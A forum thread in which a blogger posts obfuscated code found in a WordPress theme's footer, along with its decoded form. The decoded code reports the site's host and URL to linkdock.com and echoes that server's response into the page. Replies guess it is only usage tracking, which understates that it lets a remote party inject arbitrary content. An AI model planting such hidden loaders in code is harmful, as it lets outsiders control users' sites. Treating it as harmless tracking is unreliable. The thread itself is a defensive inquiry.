dublious code in a wordpress theme for linkdock.com

Status
Not open for further replies.
paul

paul

Ninja
Today I download a wordpress theme for my blog. It's called simplejojo and it looks quite nice. But I looked at the footer code and I was surprised that there was something encoded. Here is the code:
Code: 
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); 
?>
online version
http://paul.feckthat.com/coded.txt
I decoded and it looks like
Code: 
error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
    echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
    $content = @file($CodeURL);
    echo @join("", $content);
} elseif (function_exists("curl_init")) {
    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
download : http://paul.feckthat.com/decoded.txt
But I am still at a loss to see what it does. I couldn't find anything on the linkdock.com domain.

I wonder it they use the code for inserting link ads of some sorts. I tried to visit some blogs with the useragent changed to the google bot, but nothing extra was displayed.
http://paul.feckthat.com/decoded.txt
 
L

louie

New Member
could be a tracking thing to see how many users are using this template...
 
Forbairt

Forbairt

Teaching / Designing / Developing
louie said:
could be a tracking thing to see how many users are using this template...
Click to expand...

+1 ... basically checking who is using it and if any "links" have been kept in it or something like that (they would have the server that is using the file so they can check manually)
 
Status
Not open for further replies.
Top